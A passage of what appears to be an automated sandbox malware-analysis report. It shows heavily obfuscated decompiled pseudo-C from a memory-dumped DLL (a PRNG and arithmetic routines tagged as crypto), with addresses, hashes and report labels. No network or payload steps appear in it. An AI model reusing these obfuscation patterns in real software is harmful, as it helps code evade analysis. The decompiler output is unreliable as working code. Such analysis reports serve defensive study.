											if(_t471 == 0) {
												continue;
											}
											L37:
											_t509 = _v80;
											_t475 = _v40;
											__eflags = _t569 - 1;
											asm("sbb edx, 0x0");
											_t377 =  *(_t509 + 8);
											 *_t377 = _t595;
											_t377[1] = _t569;
											 *_t509 = 2;
											E6E86E690(_t569 - 1, _v68, _v52, _t509);
											_t633 = _t632 + 0xc;
											_t379 = _v44;
											__eflags = _t379 -  *((intOrPtr*)(_t475 + 4));
											if(_t379 >=  *((intOrPtr*)(_t475 + 4))) {
												 *((intOrPtr*)(_t475 + 4)) = _v96;
												_t414 = E6E853F90( *((intOrPtr*)(_t475 + 8)), _v92);
												_t633 = _t633 + 8;
												 *((intOrPtr*)(_t475 + 8)) = _t414;
												_t379 = _v44;
											}
											__eflags = _t379;
											 *_t475 = 0;
											if(__eflags < 0) {
												L44:
												_t476 = _v40;
												_t380 = E6E86E3C0(_t509, __eflags, _t476, _v68);
												_t634 = _t633 + 8;
												__eflags = _t380;
												if(_t380 != 0) {
													E6E86E380(_t476, _v52);
													_t401 = E6E859D50(0x11f2bfb2);
													_t634 = _t634 + 0xc;
													_t595 = _t595 + _t401 - 0x7586bf1f;
												}
												E6E86E650(_t476, _v68);
												_t635 = _t634 + 8;
												_t570 =  *_t476;
												__eflags = _t570;
												if(_t570 > 0) {
													_t478 = 0;
													__eflags = 1;
													_v36 = 1 - _v84;
													_v20 = _v40[2];
													_v48 = _v28[2];
													0;
													0;
													do {
														_v24 =  *((intOrPtr*)(_v20 + _t478 * 4));
														_t396 = E6E8522E0(__eflags, 0, _t478);
														E6E851460(__eflags, _t478, _v32);
														_t635 = _t635 + 0x10;
														_t478 = _t478 + 1;
														 *((intOrPtr*)(_v48 - (_t396 + _v36 << 2))) = _v24;
														_t570 =  *_v40;
														__eflags = _t478 - _t570;
													} while (__eflags < 0);
												}
												goto L49;
											} else {
												_t479 = 0;
												_v24 = _v28[2];
												_v20 = _v40[2];
												do {
													_t509 = _v24;
													_t408 =  *(_v24 + (_v32 + _t479) * 4);
													__eflags = _t408;
													 *(_v20 + _t479 * 4) = _t408;
													if(__eflags != 0) {
														_t412 = E6E8522E0(__eflags, 0, _t479);
														_t633 = _t633 + 8;
														_t509 = 1 - _t412;
														 *_v40 = 1 - _t412;
													}
													_t409 = E6E8522E0(__eflags, _t479, 0x19c77e59);
													_t410 = E6E859D50(0x7db37ef5);
													E6E851460(__eflags, _t479, 1);
													_t633 = _t633 + 0x14;
													__eflags = _t479 - _v44;
													_t479 = _t409 + _t410 + 1;
												} while (__eflags != 0);
												goto L44;
											}
										}
										_t595 = _v24;
										__eflags = _t376 & 0x00000020;
										_t569 =  ==  ? (_v20 << 0x00000020 | _t595) >> _t376 : _v20 >> _t376;
										goto L37;
										L49:
										__eflags = _t570 - _v44;
										if(_t570 <= _v44) {
											_t387 = E6E851460(__eflags, _t570 - E6E859D50(0x1f4aa581), _v116);
											__eflags = _v88 - _t570;
											E6E863580(_v28[2] + _t387 * 4 - 0x13056b4c, 0, 0x1157b474 + (_v88 - _t570) * 4);
											_t635 = _t635 + 0x18;
										}
										_t510 = _a4;
										_t532 = _v84;
										__eflags = _t595;
										_t461 = _v28;
										 *( *((intOrPtr*)(_t510 + 8)) + _t532 * 4 - 4) = _t595;
										_t590 = _v32;
										if(_t595 != 0) {
											 *_t510 = _t590;
										}
										_t383 = E6E859D50(0xf239476a);
										_t606 = _t635 + 4;
										_t347 = _v120 - _t383 + 0x964d47c7;
										__eflags = _t347 - _v104;
									} while (__eflags != 0);
									goto L53;
								}
							}
						}
						_t484 = _a12;
						_t527 = _a4;
						_t582 =  *_t484;
						__eflags =  *(_t527 + 4) - _t582;
						if( *(_t527 + 4) < _t582) {
							 *(_t527 + 4) = _t582;
							__eflags = _t582 << E6E859D50(0x647400ae);
							_t450 = E6E853F90( *((intOrPtr*)(_a4 + 8)), _t582 << E6E859D50(0x647400ae));
							_t527 = _a4;
							_t602 = _t602 + 0xc;
							 *((intOrPtr*)(_t527 + 8)) = _t450;
							_t582 =  *_t484;
						}
						__eflags = _t582;
						if(_t582 <= 0) {
							__eflags = 0;
							goto L22;
						} else {
							_t486 = 0;
							_t599 = 0;
							__eflags = 0;
							_v48 = _t484[2];
							_v36 =  *((intOrPtr*)(_t527 + 8));
							_v32 =  *((intOrPtr*)(_a16 + 8));
							0;
							0;
							do {
								_v20 = _t486;
								_v24 =  *((intOrPtr*)(_v48 + _t582 * 4 - 4));
								 *((intOrPtr*)(_v36 + _t582 * 4 - 4)) = E6E863860( *((intOrPtr*)(_v48 + _t582 * 4 - 4)), _t599,  *_v32, 0);
								_t444 = E6E855920(_v36, _t443, 0);
								_t602 = _t602 + 8;
								__eflags = _t444 & 0x00000001;
								_t445 = _v20;
								_t487 =  !=  ? _t582 : _t486;
								__eflags = _t445;
								_t486 =  !=  ? _t445 :  !=  ? _t582 : _t486;
								_t599 = E6E862E20(_v24, _t599,  *_v32, 0);
								_t582 = _t582 - 1;
								__eflags = _t582;
							} while (_t582 > 0);
							L22:
							_t549 = _v64;
							E6E86E610(_a8, 0);
							_t584 = _v52;
							 *_a4 = 0;
							L5:
							_t463 = _v28;
							goto L6;
						}
					}
					 *_a4 = 0;
					E6E86E610(_a8, 0);
					L4:
					goto L5;
				}
				 *_a4 = 0;
				E6E857D70(_t455, _a8);
				goto L4;
			}

0x6e86da70
0x6e86da79
0x6e86da81
0x6e86da88
0x6e86da90
0x6e86da97
0x6e86da9f
0x6e86daa7
0x6e86daae
0x6e86dab3
0x6e86dab8
0x6e86dacf
0x6e86dad4
0x6e86dad7
0x6e86dad9
0x6e86db38
0x6e86db3b
0x6e86db3e
0x6e86db40
0x6e86db43
0x6e86dc09
0x6e86dc20
0x6e86dc22
0x6e86dc25
0x6e86dc28
0x6e86dc2e
0x6e86dc36
0x6e86dc3b
0x6e86dc40
0x6e86dc46
0x6e86dc48
0x6e86dc4a
0x6e86dc4d
0x6e86dc4f
0x6e86dc5d
0x6e86dc62
0x6e86dc65
0x6e86dc65
0x6e86dc68
0x6e86dc6f
0x6e86dc7b
0x6e86dc80
0x6e86dc83
0x6e86dc85
0x6e86dc88
0x6e86dc8b
0x6e86dc90
0x6e86dd44
0x6e86dd4b
0x00000000
0x6e86dc96
0x6e86dc96
0x6e86dc96
0x6e86dc98
0x6e86dca0
0x6e86dca6
0x6e86dca9
0x6e86dcb2
0x6e86dcd1
0x6e86dce0
0x6e86dcef
0x6e86dcf2
0x6e86dcf7
0x6e86dcfa
0x6e86dcfd
0x6e86dcfd
0x6e86dd03
0x6e86dd05
0x6e86dd52
0x6e86dd55
0x6e86dd55
0x6e86dd57
0x6e86dd07
0x6e86dd0c
0x6e86dd15
0x6e86dd19
0x6e86dd1e
0x6e86dd1e
0x6e86dd5e
0x6e86dd61
0x6e86dd63
0x6e86dd65
0x6e86dd67
0x6e86dd6a
0x6e86dd6d
0x6e86dd6f
0x6e86dd72
0x6e86dd74
0x6e86dd77
0x6e86dd7e
0x6e86dd83
0x6e86dd86
0x6e86dd86
0x6e86dd8f
0x6e86dd8f
0x6e86dd99
0x6e86dd9c
0x6e86dd9f
0x6e86dda1
0x6e86e285
0x6e86e288
0x6e86e290
0x6e86e295
0x6e86e297
0x6e86e29b
0x6e86e29e
0x6e86e2a0
0x6e86e2a2
0x6e86e2a4
0x6e86e300
0x6e86e302
0x6e86e302
0x6e86e305
0x6e86e307
0x6e86e30d
0x6e86e315
0x6e86e318
0x6e86daf4
0x6e86daf4
0x6e86daf5
0x6e86dafd
0x6e86db00
0x6e86db08
0x6e86db0b
0x6e86db13
0x6e86db14
0x6e86db1c
0x6e86db1d
0x6e86db25
0x6e86db34
0x6e86db34
0x6e86e2a9
0x6e86e2ab
0x6e86e2ae
0x6e86e2ae
0x6e86e2b0
0x6e86e2b0
0x6e86e2b7
0x6e86e2c2
0x6e86e2c9
0x6e86e2cd
0x6e86e2d3
0x6e86e2d6
0x6e86e2d8
0x6e86e2e2
0x6e86e2e6
0x6e86e2f0
0x6e86e2f5
0x6e86e2f8
0x6e86e2fb
0x6e86e2fb
0x6e86e2fb
0x00000000
0x6e86dda7
0x6e86dda9
0x6e86ddb5
0x6e86ddbb
0x6e86ddc5
0x6e86ddd3
0x6e86dde6
0x6e86ddeb
0x6e86de04
0x6e86de0b
0x6e86de28
0x6e86de35
0x6e86de3a
0x6e86de45
0x6e86de54
0x6e86de57
0x6e86de59
0x6e86de5c
0x6e86de5f
0x6e86de92
0x6e86de95
0x6e86de9d
0x6e86dea3
0x6e86deae
0x6e86deb1
0x6e86dec9
0x6e86decf
0x6e86ded3
0x6e86def7
0x6e86df06
0x6e86df0c
0x6e86df0f
0x6e86df17
0x6e86df1c
0x6e86df1f
0x6e86df21
0x6e86df24
0x6e86df2c
0x6e86df2f
0x6e86df37
0x6e86df3d
0x6e86df42
0x6e86df4a
0x6e86df54
0x6e86df72
0x6e86df7a
0x6e86df7c
0x6e86df83
0x6e86df89
0x6e86df91
0x6e86df96
0x6e86df99
0x6e86df9c
0x6e86dfa6
0x6e86dfa9
0x6e86dfb0
0x6e86dfb5
0x6e86dfb9
0x6e86dfbd
0x6e86dfcc
0x6e86dfe1
0x6e86dfe3
0x6e86dfee
0x6e86dff0
0x6e86dff3
0x6e86dff6
0x6e86dffe
0x6e86e008
0x6e86e00d
0x6e86e010
0x6e86e012
0x6e86e015
0x00000000
0x00000000
0x6e86e021
0x6e86e031
0x6e86e035
0x6e86e037
0x6e86e03d
0x6e86e049
0x6e86e04e
0x6e86e054
0x6e86e056
0x6e86e058
0x6e86e058
0x6e86e05b
0x6e86e05f
0x00000000
0x00000000
0x6e86e084
0x6e86e084
0x6e86e087
0x6e86e08a
0x6e86e092
0x6e86e095
0x6e86e098
0x6e86e09a
0x6e86e09d
0x6e86e0a6
0x6e86e0ab
0x6e86e0ae
0x6e86e0b1
0x6e86e0b4
0x6e86e0b9
0x6e86e0c2
0x6e86e0c7
0x6e86e0ca
0x6e86e0cd
0x6e86e0cd
0x6e86e0d0
0x6e86e0d2
0x6e86e0d8
0x6e86e170
0x6e86e173
0x6e86e177
0x6e86e17c
0x6e86e17f
0x6e86e181
0x6e86e187
0x6e86e194
0x6e86e199
0x6e86e19c
0x6e86e19c
0x6e86e1a7
0x6e86e1ac
0x6e86e1af
0x6e86e1b1
0x6e86e1b3
0x6e86e1bd
0x6e86e1bf
0x6e86e1c5
0x6e86e1c8
0x6e86e1d1
0x6e86e1da
0x6e86e1de
0x6e86e1e0
0x6e86e1e6
0x6e86e1ec
0x6e86e1fd
0x6e86e202
0x6e86e20e
0x6e86e211
0x6e86e216
0x6e86e218
0x6e86e218
0x6e86e1e0
0x00000000
0x6e86e0de
0x6e86e0e1
0x6e86e0e6
0x6e86e0ef
0x6e86e133
0x6e86e136
0x6e86e13e
0x6e86e141
0x6e86e143
0x6e86e146
0x6e86e14b
0x6e86e150
0x6e86e15b
0x6e86e15d
0x6e86e15d
0x6e86e106
0x6e86e115
0x6e86e124
0x6e86e129
0x6e86e12c
0x6e86e12f
0x6e86e12f
0x00000000
0x6e86e133
0x6e86e0d8
0x6e86e070
0x6e86e07f
0x6e86e081
0x00000000
0x6e86e21c
0x6e86e21c
0x6e86e21f
0x6e86e23c
0x6e86e24e
0x6e86e25b
0x6e86e260
0x6e86e260
0x6e86e263
0x6e86e266
0x6e86e269
0x6e86e26b
0x6e86e271
0x6e86e275
0x6e86e278
0x6e86e27e
0x6e86e27e
0x6e86de75
0x6e86de7a
0x6e86de84
0x6e86de89
0x6e86de89
0x00000000
0x6e86de92
0x6e86dda1
0x6e86dc90
0x6e86db49
0x6e86db4c
0x6e86db4f
0x6e86db51
0x6e86db54
0x6e86db56
0x6e86db68
0x6e86db71
0x6e86db76
0x6e86db79
0x6e86db7c
0x6e86db7f
0x6e86db7f
0x6e86db81
0x6e86db83
0x6e86dd25
0x00000000
0x6e86db89
0x6e86db8f
0x6e86db91
0x6e86db91
0x6e86db93
0x6e86db99
0x6e86db9f
0x6e86dba8
0x6e86dbac
0x6e86dbb0
0x6e86dbb3
0x6e86dbba
0x6e86dbce
0x6e86dbd5
0x6e86dbda
0x6e86dbdd
0x6e86dbdf
0x6e86dbe2
0x6e86dbe5
0x6e86dbe7
0x6e86dbfa
0x6e86dbfc
0x6e86dbfc
0x6e86dbfc
0x6e86dd27
0x6e86dd27
0x6e86dd2f
0x6e86dd3a
0x6e86dd3d
0x6e86daf1
0x6e86daf1
0x00000000
0x6e86daf1
0x6e86db83
0x6e86dade
0x6e86dae9
0x6e86daee
0x00000000
0x6e86daee
0x6e86dabd
0x6e86dac7
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2156706145.000000006E851000.00000020.00020000.sdmp, Offset: 6E850000, based on PE: true

Associated: 00000004.00000002.2156700266.000000006E850000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156723267.000000006E870000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156729505.000000006E872000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156741521.000000006E875000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1768319437aad408c67764f60e743360104f9f36da953b319cd80b4c0e695f83
Instruction ID: 183ea0a6bddea488fa533a813d09a27a00bd53777c3dfd054c0bf51092cf4103
Opcode Fuzzy Hash: 1768319437aad408c67764f60e743360104f9f36da953b319cd80b4c0e695f83
Instruction Fuzzy Hash: D84273B5D002099FDB00DFE8DC81AEEB7B9AF49318F154929E814AB351E731AD15CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E865BF0, Relevance: .3, Instructions: 307
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6E865BF0(void* __eflags) {
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				void* _t48;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t57;
				void* _t60;
				unsigned int _t64;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t86;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				void* _t103;
				signed int _t104;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				signed int _t111;
				signed int _t120;
				signed int _t121;
				signed int _t128;
				signed int _t131;
				signed int _t169;
				void* _t179;
				signed int _t183;
				signed int _t188;
				signed int _t194;
				void* _t195;
				void* _t196;
				signed int _t237;

				_t169 =  *0x6e874194; // 0x1
				_t48 = E6E859D50(0x647402c3);
				_t196 = _t195 + 4;
				_t234 = _t169 - _t48;
				if(_t169 > _t48) {
					_t179 = 0xfffffc74;
					0;
					do {
						_v24 = E6E8520A0(_t234,  *(_t179 + 0x6e873b60), 0xffffffff);
						_t69 = E6E859D50(0xe47400ac);
						_t71 = E6E8520A0(_t234, E6E859D50(0x5c38c288), 0xffffffff);
						_t74 = E6E853750(_t234,  !(E6E852DC0(_t234, _v24,  !_t69)), _t71 | 0x384cc224);
						_t196 = _t196 + 0x28;
						 *(_t179 + 0x6e873b60) =  *(0x6e870434 + ( *(_t179 + 0x6e873b64) & 0x00000001) * 4) ^  *(_t179 + 0x6e874194) ^ ( *(_t179 + 0x6e873b64) & 0x7ffffffe | _t74) >> 0x00000001;
						_t179 = _t179 + 4;
						_t235 = _t179;
					} while (_t179 != 0);
					_t75 = 0xe3;
					_t120 = 0xe3;
					0;
					do {
						_v24 = _t75;
						_v20 = 0x6e8737d4[_t75];
						_t77 = E6E859D50(0xe47400ac);
						_t78 = E6E852DC0(_t235, 0xe98fe736, 0x167018c9);
						_t121 = _t120 - E6E859D50(0xdd67dd4);
						_v36 = _t121 + 0x69a27d79;
						_v20 =  *((intOrPtr*)(0x15112db8 + _t121 * 4));
						_t81 = E6E8520A0(_t235, 0x7ffffffe, 0xffffffff);
						E6E853750(_t235, _v20, 0x7ffffffe);
						_v28 =  !(_t78 & _v20 & _t77);
						_t86 = E6E859D50(0x58908707);
						_v28 = E6E852DC0(_t235, E6E8520A0(_t235,  !_t81 & _v20 & 0xc31b7854 | _t86 &  !( !_t81 & _v20), _t78 & _v20 & _t77 & 0xc31b7854 | E6E859D50(0x58908707) & _v28),  !_t81 & _v20 & _t78 & _v20 & _t77);
						E6E852DC0(_t235,  !_t81 & _v20, _t78 & _v20 & _t77);
						E6E859D50(0x9b8bffb1);
						_v28 = _v28 >> 1;
						_t128 =  *(0x6e873448 + _v24 * 4);
						_v32 = _t128;
						_t183 =  *(0x6e870434 + (_v20 & 0x00000001) * 4);
						_v20 = _t183;
						_t97 = E6E8520A0(_t235, 0xc62da7e4, 0xffffffff);
						_t98 = E6E853750(_t235, _v32, _t97);
						_t120 = _v36;
						_t188 = (_t98 |  !_t128 & 0xc62da7e4) ^ (_t97 & _v20 |  !_t183 & 0xc62da7e4);
						E6E8520A0(_t235, _v20, _v32);
						_t100 = _v28;
						E6E8520A0(_t235, _t188, _t100);
						0x6e8737d4[_v24] = _t188 ^ _t100;
						_t103 = E6E859D50(0x647402c3);
						_t196 = _t196 + 0x68;
						_t236 = _t120 - _t103;
						_t75 = _t120;
					} while (_t120 != _t103);
					_t104 = E6E853750(_t236,  *0x6e874190, 0x80000000);
					_t131 =  *0x6e8737d4; // 0xd9c33409
					_t105 = E6E859D50(0x1b8bff52);
					_v24 = _t131;
					_t106 = E6E8520A0(_t236, _t131, 0xffffffff);
					_t107 = E6E8520A0(_t236, 1, 0xffffffff);
					_t111 = E6E853750(_t236,  !(_t107 | _t106), (E6E859D50(0x72976c99) | 0x16e36c35) ^ 0xe91c93ca);
					E6E853750(_t236, _v24, 1);
					_t196 = _t196 + 0x30;
					_t194 = (_t105 & _t131 | _t104) >> 0x00000001 ^  *0x6e873e04 ^  *(0x6e870434 + _t111 * 4);
					_t237 = _t194;
					 *0x6e874194 = 0;
					 *0x6e874190 = _t194;
				}
				_t49 =  *0x6e874194; // 0x1
				_t150 = 0x6e8737d4[_t49];
				_t47 = _t49 + 1; // 0x2
				 *0x6e874194 = _t47;
				_t50 = E6E8520A0(_t237, 0x6e8737d4[_t49], 0xffffffff);
				_t51 = E6E859D50(0x209e1c2b);
				E6E8520A0(_t237, _t150 >> 0xb, _t150);
				_t57 = E6E8520A0(_t237, ((_t150 & 0xbb15e378 | _t51 & _t50) ^ _t150 >> 0x0000000b ^ 0x44ea1c87) << 0x00000007 & 0x9d2c5680, (_t150 & 0xbb15e378 | _t51 & _t50) ^ _t150 >> 0x0000000b ^ 0x44ea1c87);
				E6E859D50(0x8bb200ac);
				_t60 = E6E853750(_t237, E6E8520A0(_t237, _t57, 0xffffffff), 0x33945623);
				_t64 = E6E852DC0(_t237, _t60, E6E853750(_t237, _t57, 0xcc6ba9dc)) ^ _t57 << 0x0000000f & 0xefc60000 ^ 0x33945623;
				return E6E8520A0(_t237, _t64, 0xffffffff) & _t64 >> 0x00000012 |  !(_t64 >> 0x12) & _t64;
			}

0x6e865bf9
0x6e865c04
0x6e865c09
0x6e865c0c
0x6e865c0e
0x6e865c14
0x6e865c1f
0x6e865c20
0x6e865c30
0x6e865c38
0x6e865c54
0x6e865c74
0x6e865c79
0x6e865ca0
0x6e865ca6
0x6e865ca6
0x6e865ca6
0x6e865caf
0x6e865cb4
0x6e865cbc
0x6e865cc0
0x6e865cc0
0x6e865cca
0x6e865cd2
0x6e865ce6
0x6e865d02
0x6e865d11
0x6e865d14
0x6e865d1e
0x6e865d35
0x6e865d45
0x6e865d4d
0x6e865d93
0x6e865d98
0x6e865da5
0x6e865db0
0x6e865db3
0x6e865dc0
0x6e865dc5
0x6e865dcc
0x6e865dde
0x6e865df7
0x6e865e03
0x6e865e06
0x6e865e0e
0x6e865e16
0x6e865e1f
0x6e865e2a
0x6e865e36
0x6e865e3b
0x6e865e3e
0x6e865e40
0x6e865e40
0x6e865e53
0x6e865e5b
0x6e865e68
0x6e865e72
0x6e865e84
0x6e865e92
0x6e865eb9
0x6e865ec8
0x6e865ecd
0x6e865ed0
0x6e865ed0
0x6e865ed7
0x6e865ee1
0x6e865ee1
0x6e865ee7
0x6e865eec
0x6e865ef3
0x6e865ef6
0x6e865f04
0x6e865f13
0x6e865f31
0x6e865f45
0x6e865f59
0x6e865f72
0x6e865f9c
0x6e865fc2

Memory Dump Source

Source File: 00000004.00000002.2156706145.000000006E851000.00000020.00020000.sdmp, Offset: 6E850000, based on PE: true

Associated: 00000004.00000002.2156700266.000000006E850000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156723267.000000006E870000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156729505.000000006E872000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156741521.000000006E875000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ec8afa1df31a470c7a76306b8e8878dfe6a1bbee9620ffd2b8bf2f7f9abb45e
Instruction ID: 00e2dc26519e2f1bf0409f8deedb6b52ce03ac434f55516e499ec71b737e7c78
Opcode Fuzzy Hash: 4ec8afa1df31a470c7a76306b8e8878dfe6a1bbee9620ffd2b8bf2f7f9abb45e
Instruction Fuzzy Hash: 9D915FF7D102245BDB019BF8EC459AE7AA89B56229B490E34DC1CB7381FF255D20C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 6E853A30, Relevance: .1, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6E853A30(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v20;
				signed char _v24;
				signed int _v28;
				signed int _v32;
				signed char _t68;
				signed int _t69;
				signed int _t72;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				signed int _t79;
				signed char _t88;
				signed int _t95;
				signed char _t96;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				signed int _t101;
				signed int _t109;
				signed char _t113;
				signed int _t114;
				signed int _t133;
				signed int _t145;
				signed int _t147;
				signed char _t156;
				signed int _t157;
				signed int _t162;
				signed int _t163;

				_t97 = _a12;
				_t68 = (((_a4 + 0x00000033 | _t97) - _t97 & 0x000000ff) << 6) + ((_a4 + 0x00000033 | _t97) - _t97 & 0x000000ff) * 2 + 0xd6;
				_t156 = _t68;
				_t69 = _t68 * _t97;
				_t145 = _a8;
				if((_t68 * _t97 >> 0x00000020 | _t68 ^ _t97) != 0) {
					_v32 = _t156;
					_t98 = _a4;
				} else {
					_t98 = _a4;
					_t95 = (_t69 + _t156 & 0x000000ff | _t98) & _a12;
					_t96 = _t95 - _t98;
					_v32 = _t96;
					_t69 = _t95;
					_v28 = _t96 + _t69;
				}
				_v20 = _t69;
				_t157 = _t69;
				_t72 = E6E859C60(_t98, _t145, _t157, _t157 >> 0x1f);
				_v24 = 0;
				if((_t145 ^ _a16 | _t98 ^ _a12) != 0) {
					_t109 = _a12;
				} else {
					_t109 = _a12;
					if((_t72 & 0x00000001) != 0) {
						_t88 = _v20 * _v28;
						_t145 = (_t88 + _t109) * _t157;
						_v24 = (_t88 & 0x000000ff) + _t145;
					}
				}
				_t73 = _t109;
				_t74 = _t73 * _t98;
				_v28 = _t74;
				_t162 = _a16 * _t98 + _t109 * _a8 + (_t73 * _t98 >> 0x20);
				_t113 = _v24 + _t145;
				_v24 = _t113;
				_t100 = _t113 * _t74;
				_t76 = E6E859D50(0x647420ac) & (_t145 ^ _t100);
				_t114 = _t76;
				_t101 = _t100 | _t114;
				_v20 = _t162;
				_t147 = _v28;
				_t163 = _t147;
				if((_t147 ^ _a12 | _t162 ^ _a16) == 0) {
					L10:
					_t101 = _t101 * _t114 + _v24;
					_t79 = _t163 * _v32;
					_t133 = _t79 * _t101 >> 0x20;
					_t76 = (_t79 * _t101 & 0x000000ff) * 0x00000045 | _t101;
					goto L11;
				} else {
					_t133 = _t163;
					if((_a8 ^ _v20 | _a4 ^ _t133) == 0) {
						L11:
						 *0x6e8720d8 = ((_t133 & _t133 + _t76 & 0x000000ff) + _t76) * _t101;
						return _t133;
					}
					_t163 = _t133;
					if((_v32 >> 0x0000001f ^ _a16 | _a12 ^ _v32) != 0) {
						_t133 = _t163;
						goto L11;
					}
					goto L10;
				}
			}

0x6e853a39
0x6e853a50
0x6e853a5f
0x6e853a61
0x6e853a65
0x6e853a68
0x6e853a8b
0x6e853a8e
0x6e853a6a
0x6e853a71
0x6e853a76
0x6e853a7b
0x6e853a7d
0x6e853a82
0x6e853a86
0x6e853a86
0x6e853a91
0x6e853a94
0x6e853aa0
0x6e853ab2
0x6e853abb
0x6e853ae0
0x6e853abd
0x6e853ac0
0x6e853ac3
0x6e853ac8
0x6e853ad0
0x6e853adb
0x6e853adb
0x6e853ac3
0x6e853ae3
0x6e853ae5
0x6e853ae9
0x6e853afa
0x6e853aff
0x6e853b01
0x6e853b07
0x6e853b19
0x6e853b1b
0x6e853b1e
0x6e853b20
0x6e853b28
0x6e853b2b
0x6e853b32
0x6e853b5c
0x6e853b63
0x6e853b69
0x6e853b6c
0x6e853b77
0x00000000
0x6e853b34
0x6e853b34
0x6e853b45
0x6e853b79
0x6e853b8c
0x6e853b9d
0x6e853b9d
0x6e853b47
0x6e853b5a
0x6e853b9e
0x00000000
0x6e853b9e
0x00000000
0x6e853b5a

Memory Dump Source

Source File: 00000004.00000002.2156706145.000000006E851000.00000020.00020000.sdmp, Offset: 6E850000, based on PE: true

Associated: 00000004.00000002.2156700266.000000006E850000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156723267.000000006E870000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156729505.000000006E872000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156741521.000000006E875000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80f4d3877014fb36ebd064fc7a43917da429f9c69c2776d97675cef2b632b7b0
Instruction ID: 2bfe2da9d96be5c5bcf862fd3c3491f8ffdf02b86513b6b201a7d1c797765844
Opcode Fuzzy Hash: 80f4d3877014fb36ebd064fc7a43917da429f9c69c2776d97675cef2b632b7b0
Instruction Fuzzy Hash: A241A572E001294F9B48CE6DCC915FFB7FAAB88310B15842AE855E7345DA34AD168BE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E859A60, Relevance: .1, Instructions: 127
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E6E859A60(void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v20;
				signed char _v24;
				signed int _t41;
				signed char _t42;
				signed int _t43;
				signed char _t45;
				signed int _t50;
				signed int _t54;
				signed int _t55;
				signed char _t59;
				signed int _t61;
				signed char _t66;
				signed int _t67;
				signed int _t68;
				signed char _t71;
				signed int _t78;
				signed char _t83;
				signed char _t85;
				signed int _t86;
				signed int _t94;
				signed int _t105;
				signed int _t116;

				_t105 = _a4;
				_t59 = (_t105 ^ 0x000000f5) - _t105;
				_t41 = E6E857DD0(0xa4) & _t59;
				_t78 = _t41 * _t59 >> 0x20;
				_t42 = _t41 * _t59;
				_t68 = _t42;
				_t61 = _t42 & _t105;
				_t43 = _a8;
				asm("sbb eax, [ebp+0x14]");
				if(_t105 < _a12) {
					_t55 = _t68 + _t61;
					_t78 = _t55 * _t78 >> 0x20;
					_t68 = _t55 * _t78;
					_t43 = _t68;
					_v20 = _t43;
					_t61 = 0;
				}
				if((_t68 >> 0x0000001f ^ _a8 | _t68 ^ _t78) == 0) {
					_t94 = _a12;
				} else {
					_t94 = _a12;
					if((_t68 >> 0x0000001f ^ _a16 | _t68 ^ _t94) != 0) {
						_t54 = _v20;
						_t67 = _t61 & _t54 * _t94;
						_t43 = _t54 + _t67 + 0xe;
						_t68 = _t67;
					}
				}
				_v24 = 0;
				if((_a8 ^ _a16 | _a4 ^ _t94) != 0) {
					_v24 = 0x1cb;
				}
				_t83 = _t43 ^ _v20;
				_t45 = _t68 & _t83;
				_t66 = _t45 + 0xfffffefa;
				if((_t83 >> 0x0000001f ^ _a8 | _t83 ^ _a4) != 0 || (_t66 >> 0x0000001f ^ _a8 | _t66 ^ _a4) != 0) {
					_t71 = (_t68 ^ _t68 ^ _t66) + _t83;
					_t83 = _t71;
					_t68 = _t45 + (_t71 + _t66 & _t45) + (_t71 + _t66 & _t45);
				}
				_v20 = _t83;
				_t116 = _t83;
				if((_a16 ^ _t116 >> 0x0000001f | _a12 ^ _t116) == 0) {
					L14:
					_t50 = (_t68 ^ _v20) - _t66;
					_t85 = _v24;
					_t86 = _t50 * _t85 >> 0x20;
					_t68 = _t50 * _t85;
					goto L15;
				} else {
					asm("sbb eax, edi");
					if(_t116 >= _a4) {
						goto L14;
					}
					_t86 = _v24;
					L15:
					 *0x6e872098 = _t68;
					return _t86;
				}
			}

0x6e859a6c
0x6e859a77
0x6e859a88
0x6e859a8a
0x6e859a8a
0x6e859a8c
0x6e859a91
0x6e859a96
0x6e859a98
0x6e859a9b
0x6e859a9f
0x6e859aa1
0x6e859aa3
0x6e859aa5
0x6e859aa8
0x6e859aab
0x6e859aab
0x6e859ac0
0x6e859aeb
0x6e859ac2
0x6e859aca
0x6e859ad4
0x6e859ad6
0x6e859ade
0x6e859ae3
0x6e859ae7
0x6e859ae7
0x6e859ad4
0x6e859afb
0x6e859b04
0x6e859b06
0x6e859b06
0x6e859b0f
0x6e859b14
0x6e859b19
0x6e859b2f
0x6e859b46
0x6e859b48
0x6e859b52
0x6e859b52
0x6e859b57
0x6e859b5a
0x6e859b70
0x6e859b7e
0x6e859b83
0x6e859b85
0x6e859b88
0x6e859b8a
0x00000000
0x6e859b72
0x6e859b75
0x6e859b77
0x00000000
0x00000000
0x6e859b79
0x6e859b8c
0x6e859b8f
0x6e859b9d
0x6e859b9d

Memory Dump Source

